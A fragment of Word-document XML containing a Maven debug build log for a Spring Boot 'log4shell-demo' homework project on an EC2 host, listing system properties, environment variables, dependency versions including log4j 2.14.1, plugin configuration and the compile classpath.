    <w:p w14:paraId="3B309C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eval ${which_declare} ) | /usr/bin/which --tty-only --read-alias --read-functions --show-tilde --show-dot "$@"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DEA96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user.home=/home/ec2-user, postgresql.version=42.2.23, reactive-streams.version=1.0.3, env.DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus, jmustache.version=1.15, querydsl.version=4.4.0, appengine-sdk.version=1.9.91, thymeleaf-layout-dialect.version=2.5.3, hamcrest.version=2.2, os.version=6.1.134-152.225.amzn2023.x86_64, commons-pool.version=1.6, jakarta-jms.version=2.0.3, jakarta-transaction.version=1.3.3, env.MAIL=/var/spool/mail/ec2-user, java.vm.name=OpenJDK 64-Bit Server VM, maven-help-plugin.version=3.2.0, mimepull.version=1.9.15, json-path.version=2.5.0, jaxen.version=1.2.0, johnzon.version=1.2.14, os.arch=amd64, spring-batch.version=4.3.3, couchbase-client.version=3.1.7, derby.version=10.14.2.0, javax-jsonb.version=1.0, rxjava2.version=2.2.21, javax-jaxws.version=2.3.1, json-smart.version=2.4.7, javax-websocket.version=1.1, commons-codec.version=1.15, caffeine.version=2.9.2, h2.version=1.4.200, env.JAVA_HOME=/usr/lib/jvm/java-17, java.vm.compressedOopsMode=32-bit, pooled-jms.version=1.2.2, unboundid-ldapsdk.version=4.0.14, thymeleaf-extras-springsecurity.version=3.0.4.RELEASE, javax-jaxb.version=2.3.1, sqlite-jdbc.version=3.34.0, jakarta-servlet-jsp-jstl.version=1.2.7, activemq.version=5.16.3, httpasyncclient.version=4.1.4, jtds.version=1.3.1, javax-jms.version=2.0.1, jakarta-websocket.version=1.1.2, env.LOGNAME=ec2-user, spring-security.version=5.5.2, hibernate-validator.version=6.2.0.Final, assertj.version=3.19.0, jakarta-xml-soap.version=1.4.2, influxdb-java.version=2.21, httpcore5.version=5.1.1, lombok.version=1.18.20, maven.compiler.target=11, jakarta-xml-ws.version=2.3.3, env.S_COLORS=auto, library.jansi.path=/usr/share/maven/lib/jansi-native, env.XDG_SESSION_CLASS=user, commons-pool2.version=2.9.0, jackson-bom.version=2.12.5, env.VIRTUAL_ENV=/home/ec2-user/log4shell-homework/venv, spring-retry.version=1.3.1, maven-invoker-</w:t>
      </w:r>
      <w:r w:rsidRPr="009B72F7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>plugin.version=3.2.2, maven-antrun-plugin.version=1.8, maven.conf=/usr/share/maven/conf, sun.java.launcher=SUN_STANDARD, resource.delimiter=@, javax-json.version=1.1.4, jboss-logging.version=3.4.2.Final, maven-resources-plugin.version=3.2.0, javax-validation.version=2.0.1.Final, netty.version=4.1.68.Final, jetty-jsp.version=2.2.0.v201112011158, maven-source-plugin.version=3.2.1, jetty.version=9.4.43.v20210629, rxjava.version=1.3.8, elasticsearch.version=7.12.1, java.runtime.name=OpenJDK Runtime Environment, env.XDG_SESSION_ID=8, rest-assured.version=4.3.3, env.SYSTEMD_COLORS=false, maven-deploy-plugin.version=2.8.2, env.MAVEN_CMD_LINE_ARGS= spring-boot:run -X, log4j2.version=2.14.1, maven-failsafe-plugin.version=2.22.2, spring-framework.version=5.3.10, dropwizard-metrics.version=4.1.25, git-commit-id-plugin.version=4.0.5, kotlin-coroutines.version=1.5.2, hazelcast-hibernate5.version=2.2.1, htmlunit.version=2.49.1, env.TERM=xterm-256color, sun.arch.data.model=64, spring-restdocs.version=2.0.5.RELEASE, freemarker.version=2.3.31, thymeleaf.version=3.0.12.RELEASE, jakarta-json.version=1.1.6, janino.version=3.1.6, maven-jar-plugin.version=3.2.0, maven-compiler-plugin.version=3.8.1, java.specification.vendor=Oracle Corporation, rabbit-amqp-client.version=5.12.0, java.version.date=2025-04-15, spring-amqp.version=2.3.10, java.home=/usr/lib/jvm/java-17-amazon-corretto.x86_64, maven-war-plugin.version=3.3.2, jolokia.version=1.6.2, sun.management.compiler=HotSpot 64-Bit Tiered Compilers, jetty-reactive-httpclient.version=1.1.10, env.PATH=/home/ec2-user/log4shell-homework/venv/bin:/home/ec2-user/.local/bin:/home/ec2-user/bin:/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin, maven-dependency-plugin.version=3.1.2, httpclient.version=4.5.13, env.LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=01;37;41:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=01;36:*.au=01;36:*.flac=01;36:*.m4a=01;36:*.mid=01;36:*.midi=01;36:*.mka=01;36:*.mp3=01;36:*.mpc=01;36:*.ogg=01;36:*.ra=01;36:*.wav=01;36:*.oga=01;36:*.opus=01;36:*.spx=01;36:*.xspf=01;36:, jsonassert.version=1.5.0, file.encoding=UTF-8, gson.version=2.8.8, sun-mail.version=1.6.7, jakarta-annotation.version=1.3.5, env.HOSTNAME=ip-172-31-46-85.us-east-2.compute.internal, env.SHLVL=1, mssql-jdbc.version=9.2.1.jre8, snakeyaml.version=1.28, okhttp3.version=3.14.9, liquibase.version=4.3.5, httpcore.version=4.4.14, lettuce.version=6.1.5.RELEASE, classworlds.conf=/usr/share/maven/bin/m2.conf, sun.io.unicode.encoding=UnicodeLittle, kotlin.version=1.5.31, wsdl4j.version=1.6.3, tomcat.version=9.0.53, sendgrid.version=4.7.5, env.SSH_CLIENT=76.141.92.20 44903 22, glassfish-jaxb.version=2.3.5, spring-ws.version=3.1.1, commons-lang3.version=3.12.0, os.name=Linux, junit.version=4.13.2, jetty-el.version=9.0.52, env.SELINUX_USE_CURRENT_RANGE=, db2-jdbc.version=11.5.6.0, maven.build.timestamp=2025-05-28T23:35:31Z, env.SSH_CONNECTION=76.141.92.20 44903 172.31.46.85 22, reactor-bom.version=2020.0.11, maven-enforcer-plugin.version=3.0.0, jstl.version=1.2, quartz.version=2.3.2, javax-money.version=1.1, spring-hateoas.version=1.3.4, path.separator=:, env.SHELL=/bin/bash, jakarta-validation.version=2.0.2, env.HISTSIZE=1000, maven.multiModuleProjectDirectory=/home/ec2-user/log4shell-homework, oracle-database.version=21.1.0.0, env.MAVEN_PROJECTBASEDIR=/home/ec2-user/log4shell-</w:t>
      </w:r>
      <w:r w:rsidRPr="009B72F7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>homework, java.vm.info=mixed mode, sharing, cassandra-driver.version=4.11.3, env.USER=ec2-user, java.class.version=61.0, xml-maven-plugin.version=1.0.2, sun.jnu.encoding=UTF-8, xmlunit2.version=2.8.2, jakarta-mail.version=1.6.7, slf4j.version=1.7.32, r2dbc-bom.version=Arabba-SR10, solr.version=8.8.2, saaj-impl.version=1.5.3, nimbus-jose-jwt.version=9.10.1, maven.build.version=Apache Maven 3.8.4 (Red Hat 3.8.4-3.amzn2023.0.5), hikaricp.version=4.0.3, maven.home=/usr/share/maven, netty-tcnative.version=2.0.43.Final, maven-shade-plugin.version=3.2.4, sun.stderr.encoding=UTF-8, jakarta-json-bind.version=1.0.2, file.separator=/, line.separator=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43150F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sun.stdout.encoding=UTF-8, env.SSH_TTY=/dev/pts/0, spring-kafka.version=2.7.7, jersey.version=2.33, spring.boot.version=2.5.5, user.name=ec2-user, hazelcast.version=4.1.5, env.SELINUX_LEVEL_REQUESTED=, jdom2.version=2.0.6, atomikos.version=4.0.6, aspectj.version=1.9.7, hsqldb.version=2.5.2, ojdbc.version=19.3.0.0, env.XDG_RUNTIME_DIR=/run/user/1000, webjars-locator-core.version=0.46, project.reporting.outputEncoding=UTF-8, env.MOTD_SHOWN=pam, env.XDG_SESSION_TYPE=tty, oauth2-oidc-sdk.version=9.9.1, awaitility.version=4.0.3, env.OLDPWD=/home/ec2-user/log4shell-homework, env.PWD=/home/ec2-user/log4shell-homework, embedded-mongo.version=3.0.0, env.LESSOPEN=||/usr/bin/lesspipe.sh %s, spring-ldap.version=2.3.4.RELEASE, java.class.path=/usr/share/maven/boot/plexus-classworlds-2.6.0.jar, dependency-management-plugin.version=1.0.11.RELEASE, env.HOME=/home/ec2-user, java.vm.vendor=Amazon.com Inc., maven-javadoc-plugin.version=3.2.0, servlet-api.version=4.0.1, rsocket.version=1.1.1, jakarta-persistence.version=2.2.3, artemis.version=2.17.0, groovy.version=3.0.9, javax-cache.version=1.1.1, logback.version=1.2.6, prometheus-pushgateway.version=0.10.0, sun.cpu.endian=little, versions-maven-plugin.version=2.8.1, user.language=en, jedis.version=3.6.3, maven-clean-plugin.version=3.1.0, javax-mail.version=1.6.2, maven-surefire-plugin.version=2.22.2, javax-annotation.version=1.3.2, spring-data-bom.version=2021.0.5, mysql.version=8.0.26, classmate.version=1.5.1, jaybird.version=4.0.3.java8, antlr2.version=2.7.7, selenium.version=3.141.59, glassfish-el.version=3.0.4, project.build.sourceEncoding=UTF-8, jooq.version=3.14.15, java.vendor.url.bug=https://github.com/corretto/corretto-17/issues/, user.dir=/home/ec2-user/log4shell-homework, ehcache.version=2.10.9.2, junit-jupiter.version=5.7.2, java.vm.version=17.0.15+6-LTS, neo4j-java-driver.version=4.2.7, jakarta-activation.version=1.2.2, spring-session-bom.version=2021.0.2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EE9E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72421F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6DAD74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resource with targetPath null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324865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directory /home/ec2-user/log4shell-homework/src/main/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6C3F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excludes []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DAEE3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includes [**/application*.yml, **/application*.yaml, **/application*.properties]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF22B5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4B74B31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resource with targetPath null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570866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directory /home/ec2-user/log4shell-homework/src/main/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78619AE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excludes [**/application*.yml, **/application*.yaml, **/application*.properties]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5380F6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includes []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1587D5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 skip non existing resourceDirectory /home/ec2-user/log4shell-homework/src/main/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172326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no use filter components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A80E3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DB350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maven-compiler-plugin:3.8.1:compile (default-compile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632D0A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mirror maven-default-http-blocker (http://0.0.0.0/) for ow2-snapshot (http://repository.ow2.org/nexus/content/repositories/snapshots).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5207E1D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Dependency collection stats {ConflictMarker.analyzeTime=234361, ConflictMarker.markTime=185224, ConflictMarker.nodeCount=118, ConflictIdSorter.graphTime=90524, ConflictIdSorter.topsortTime=38659, ConflictIdSorter.conflictIdCount=45, ConflictIdSorter.conflictIdCycleCount=0, ConflictResolver.totalTime=729142, ConflictResolver.conflictItemCount=72, DefaultDependencyCollector.collectTime=255582022, DefaultDependencyCollector.transformTime=1304593}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137099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org.apache.maven.plugins:maven-compiler-plugin:jar:3.8.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C26D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org.apache.maven:maven-plugin-api:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF9951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org.apache.maven:maven-model:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DACA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org.sonatype.sisu:sisu-inject-plexus:jar:1.4.2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA34D7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org.sonatype.sisu:sisu-inject-bean:jar:1.4.2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E018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org.sonatype.sisu:sisu-guice:jar:noaop:2.1.7:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A25A9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org.apache.maven:maven-artifact:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E7527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org.codehaus.plexus:plexus-utils:jar:2.0.4:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3253151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org.apache.maven:maven-core:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385DE5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org.apache.maven:maven-settings:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05431B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org.apache.maven:maven-settings-builder:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A90BA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org.apache.maven:maven-repository-metadata:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4E1E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org.apache.maven:maven-model-builder:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E79D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org.apache.maven:maven-aether-provider:jar:3.0:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48940C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org.sonatype.aether:aether-impl:jar:1.7:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BCFC5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org.sonatype.aether:aether-spi:jar:1.7:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5729F2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org.sonatype.aether:aether-api:jar:1.7:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4E77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org.sonatype.aether:aether-util:jar:1.7:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00563D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org.codehaus.plexus:plexus-interpolation:jar:1.14:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0788DF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org.codehaus.plexus:plexus-classworlds:jar:2.2.3:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FEA0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org.codehaus.plexus:plexus-component-annotations:jar:1.7.1:compile (version managed from default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4E0B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org.sonatype.plexus:plexus-sec-dispatcher:jar:1.3:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C208A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org.sonatype.plexus:plexus-cipher:jar:1.4:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57646CF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org.apache.maven.shared:maven-shared-utils:jar:3.2.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B48C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commons-io:commons-io:jar:2.5:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238C7A9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org.apache.maven.shared:maven-shared-incremental:jar:1.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F479B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org.codehaus.plexus:plexus-java:jar:0.9.10:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59326E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org.ow2.asm:asm:jar:6.2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECBFDE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com.thoughtworks.qdox:qdox:jar:2.0-M9:compile (version managed from default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D906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org.codehaus.plexus:plexus-compiler-api:jar:2.8.4:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE985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org.codehaus.plexus:plexus-compiler-manager:jar:2.8.4:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB0C6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org.codehaus.plexus:plexus-compiler-javac:jar:2.8.4:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CA20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Created new class realm plugin&gt;org.apache.maven.plugins:maven-compiler-plugin:3.8.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7058E6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Importing foreign packages into class realm plugin&gt;org.apache.maven.plugins:maven-compiler-plugin:3.8.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7DBC6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&lt; maven.api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB108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Populating class realm plugin&gt;org.apache.maven.plugins:maven-compiler-plugin:3.8.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B2C8B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org.apache.maven.plugins:maven-compiler-plugin:jar:3.8.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CC24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org.sonatype.sisu:sisu-inject-bean:jar:1.4.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA1FA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org.sonatype.sisu:sisu-guice:jar:noaop:2.1.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D02A8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org.codehaus.plexus:plexus-utils:jar:2.0.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0AFA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org.sonatype.aether:aether-util:jar:1.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3241A93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org.codehaus.plexus:plexus-interpolation:jar:1.14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0619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org.codehaus.plexus:plexus-component-annotations:jar:1.7.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310727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org.sonatype.plexus:plexus-sec-dispatcher:jar:1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8EAD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org.sonatype.plexus:plexus-cipher:jar:1.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9D33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org.apache.maven.shared:maven-shared-utils:jar:3.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC526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commons-io:commons-io:jar:2.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495192D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org.apache.maven.shared:maven-shared-incremental:jar:1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597B45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Included: org.codehaus.plexus:plexus-java:jar:0.9.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691E9D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org.ow2.asm:asm:jar:6.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56817B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com.thoughtworks.qdox:qdox:jar:2.0-M9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406CC7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org.codehaus.plexus:plexus-compiler-api:jar:2.8.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2824E0F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org.codehaus.plexus:plexus-compiler-manager:jar:2.8.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D6D06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org.codehaus.plexus:plexus-compiler-javac:jar:2.8.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3105B8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org.apache.maven.plugins:maven-compiler-plugin:3.8.1:compile from plugin realm ClassRealm[plugin&gt;org.apache.maven.plugins:maven-compiler-plugin:3.8.1, parent: jdk.internal.loader.ClassLoaders$AppClassLoader@4e0e2f2a]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437603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'org.apache.maven.plugins:maven-compiler-plugin:3.8.1:compile' with basic configurator --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217D08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basedir = /home/ec2-user/log4shell-homework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A9904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buildDirectory = /home/ec2-user/log4shell-homework/target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081062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compilePath = [/home/ec2-user/log4shell-homework/target/classes, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-web/2.5.5/spring-boot-starter-web-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter/2.5.5/spring-boot-starter-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot/2.5.5/spring-boot-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-autoconfigure/2.5.5/spring-boot-autoconfigure-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-logging/2.5.5/spring-boot-starter-logging-2.5.5.jar, /home/ec2-user/.m2/repository/ch/qos/logback/logback-classic/1.2.6/logback-classic-1.2.6.jar, /home/ec2-user/.m2/repository/ch/qos/logback/logback-core/1.2.6/logback-core-1.2.6.jar, /home/ec2-user/.m2/repository/org/slf4j/slf4j-api/1.7.32/slf4j-api-1.7.32.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-to-slf4j/2.14.1/log4j-to-slf4j-2.14.1.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-api/2.14.1/log4j-api-2.14.1.jar, /home/ec2-user/.m2/repository/org/slf4j/jul-to-slf4j/1.7.32/jul-to-slf4j-1.7.32.jar, /home/ec2-user/.m2/repository/jakarta/annotation/jakarta.annotation-api/1.3.5/jakarta.annotation-api-1.3.5.jar, /home/ec2-user/.m2/repository/org/springframework/spring-core/5.3.10/spring-core-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-jcl/5.3.10/spring-jcl-5.3.10.jar, /home/ec2-user/.m2/repository/org/yaml/snakeyaml/1.28/snakeyaml-1.28.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-json/2.5.5/spring-boot-starter-json-2.5.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-databind/2.12.5/jackson-databind-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-annotations/2.12.5/jackson-annotations-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-core/2.12.5/jackson-core-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/datatype/jackson-datatype-jdk8/2.12.5/jackson-datatype-jdk8-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/datatype/jackson-datatype-jsr310/2.12.5/jackson-datatype-jsr310-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/module/jackson-module-parameter-names/2.12.5/jackson-module-parameter-names-2.12.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-tomcat/2.5.5/spring-boot-starter-tomcat-2.5.5.jar, /home/ec2-</w:t>
      </w:r>
      <w:r w:rsidRPr="009B72F7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.53/tomcat-embed-core-9.0.53.jar, /home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-el/9.0.53/tomcat-embed-el-9.0.53.jar, /home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-websocket/9.0.53/tomcat-embed-websocket-9.0.53.jar, /home/ec2-user/.m2/repository/org/springframework/spring-web/5.3.10/spring-web-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-beans/5.3.10/spring-beans-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-webmvc/5.3.10/spring-webmvc-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-aop/5.3.10/spring-aop-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-context/5.3.10/spring-context-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-expression/5.3.10/spring-expression-5.3.10.jar]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779F0A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compileSourceRoots = [/home/ec2-user/log4shell-homework/src/main/java]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B611B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compilerId = javac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4765CDE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debug = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2798342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encoding = UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1515F9A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failOnError = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0717B0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failOnWarning = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D6F1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forceJavacCompilerUse = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE967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fork = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672D7D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generatedSourcesDirectory = /home/ec2-user/log4shell-homework/target/generated-sources/annotations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5724E67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mojoExecution = org.apache.maven.plugins:maven-compiler-plugin:3.8.1:compile {execution: default-compile}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAB7B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optimize = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B6E7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outputDirectory = /home/ec2-user/log4shell-homework/target/classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CFFA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parameters = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DCEB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project = MavenProject: com.example:log4shell-demo:0.0.1-SNAPSHOT @ /home/ec2-user/log4shell-homework/pom.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704224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projectArtifact = com.example:log4shell-demo:jar:0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347E13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session = org.apache.maven.execution.MavenSession@616b241a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C0A7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showDeprecation = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DFB6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showWarnings = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517791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skipMultiThreadWarning = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730887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source = 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29309C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staleMillis = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EA81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(s) target = 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6765F2E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useIncrementalCompilation = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D24EC6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verbose = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8CF1E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end configuration --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6628C1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compiler 'javac'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A44B8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6DF18C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66B06E8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maven-resources-plugin:3.2.0:testResources (default-testResources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198CD1F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org.apache.maven.plugins:maven-resources-plugin:3.2.0:testResources from plugin realm ClassRealm[plugin&gt;org.apache.maven.plugins:maven-resources-plugin:3.2.0, parent: jdk.internal.loader.ClassLoaders$AppClassLoader@4e0e2f2a]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5EB41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'org.apache.maven.plugins:maven-resources-plugin:3.2.0:testResources' with basic configurator --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2E95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addDefaultExcludes = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C26E7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buildFilters = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9BBEC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delimiters = [@]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F25F5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encoding = UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4042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escapeWindowsPaths = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455472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fileNameFiltering = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B7F6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includeEmptyDirs = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536835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outputDirectory = /home/ec2-user/log4shell-homework/target/test-classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDD5B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overwrite = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FB7A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project = MavenProject: com.example:log4shell-demo:0.0.1-SNAPSHOT @ /home/ec2-user/log4shell-homework/pom.xml</w:t>
      </w:r>
    </w:p>
